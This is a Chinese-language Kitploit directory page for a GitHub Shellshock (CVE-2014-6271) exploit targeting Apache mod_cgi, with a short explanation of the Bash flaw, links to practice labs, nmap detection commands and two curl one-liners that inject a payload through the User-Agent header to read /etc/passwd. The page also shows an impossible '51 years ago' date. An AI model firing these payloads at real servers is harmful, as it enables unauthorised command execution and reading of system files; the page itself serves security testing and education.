Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2014-6271 — "Shellshock" 漏洞的利用。Apache 中经由 mod_cgi 的远程代码执行。 | Kitploit
工具/GitHubGitHub/j0hnth3kn1ght/cve-2014-6271
侦察漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubj0hnth3kn1ght/cve-2014-6271

CVE-2014-6271

"Shellshock" 漏洞的利用。Apache 中经由 mod_cgi 的远程代码执行。

查看仓库
51年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Shellshock 漏洞利用 (CVE-2014-6271)

Shellshock 实际上是一个存在于 BASH 中的远程命令执行漏洞。该脚本利用启用了 mod_cgi 的 Apache 或类似 Web 环境中的漏洞。漏洞的核心在于对环境变量的操控,环境变量是影响计算机上进程运行的动态命名值。攻击者可通过将恶意代码附加到环境变量中来利用此漏洞,这些代码会在收到变量时被执行。这使攻击者有可能破坏系统。

漏洞测试实验环境

  • PentesterLab

  • VulnHub

  • TryHackMe

    视频2

查找 CGI-BIN 页面:

root@kitploit:~
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

手动测试:

root@kitploit:~
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>

警告:

我不对该工具的任何非法使用或造成的损害负责。编写它只是为了乐趣,而非恶意,旨在提高人们对黑客攻击和网络安全的意识

黑客愉快 :)

下载工具